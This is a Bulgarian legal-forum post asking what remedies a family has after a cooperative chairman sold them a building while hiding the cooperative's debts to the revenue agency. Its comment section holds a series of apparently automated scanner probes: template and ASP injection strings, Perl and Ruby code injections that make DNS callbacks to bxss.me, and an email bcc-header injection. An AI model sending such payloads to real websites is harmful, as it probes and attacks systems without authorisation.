Покупка- измама

22.02.2009г. 04:45:32
Здравейте, баща ми стана обект на измама от кооперацията в ликвидация в с.Лесичово. Сред като пазбира, че търси някакъв имот на село Председателят му предлага да купи сграда в бившето ТКЗС. Поставя обаче условие да внесе парите за нея бързо, за да не се купи от друг. Баща ми като честен и почтен човек не намира основание да откаже, не намира и причина. В съвета му издават удостоверение за дънъчна оценка, че кооперацията няма задължения . Поднатиск сключва договор за покупка, плаща парите, получава и квитанция. Председателят обаче постоянно бави получаването на нотариален акт. Най-накрая отиват при нотариус и случайно нотариуската изявява съмнение прави проверка и се оказва се, че кооперацията има задължения към НАП. Има имоти, които са запорирани, но не и този. Каква отговорност можем да предявим към председателя, който е укрил важни факти, взел е парите и не ги и привел в АДВ, след като е имало зъдължения. Какво да направим - да поискаме от съда да ни върнат парите ли, но задълженията към държавата са на първо място и може би парите няма да стигнат за обезпечаване на другите кредитори. Вторият вариант, за който мислих е, да поискам от съда да признае договорът като окончателен, но при дължимото, вероятно държавата като първи кредититор, може да оспори това по-късно. Не можем ли да изискаме личното имущество на председателя зада бъде запорирано, за да носи лична отговорност измамника за стореното? Към прокурор ли да се обърнем веднага или да заведем наказателно дело по частен път? Всички много тежко изживяваме това, особено децата, а парите са основно мои. Дъщеря ми написа нещо тук:

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:23
lxbfYeaa
05.10.2023г. 07:23
${9999045+10000485}
lxbfYeaa
05.10.2023г. 07:23
&n914646=v922167
lxbfYeaa
05.10.2023г. 07:23
response.write(9678528*9975798)
lxbfYeaa
05.10.2023г. 07:23
'+response.write(9678528*9975798)+'
lxbfYeaa
05.10.2023г. 07:23
"+response.write(9678528*9975798)+"
lxbfYeaa
05.10.2023г. 07:23
'.gethostbyname(lc('hitxt'.'knknqtuad4e2f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(71).chr(98).chr(71).'
lxbfYeaa
05.10.2023г. 07:23
"+"A".concat(70-3).concat(22*4).concat(102).concat(74).concat(122).concat(73)+(require"socket" Socket.gethostbyname("hitts"+"nvoslpst7f3dc.bxss.me.")[3].to_s)+"
lxbfYeaa
05.10.2023г. 07:23
bcc:009247.5555-63692.5555.63946.19635.2@bxss.me
lxbfYeaa
05.10.2023г. 07:23
".gethostbyname(lc("hitdv"."hzfoicgm2a8ce.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(75).chr(110).chr(77)."

Коментар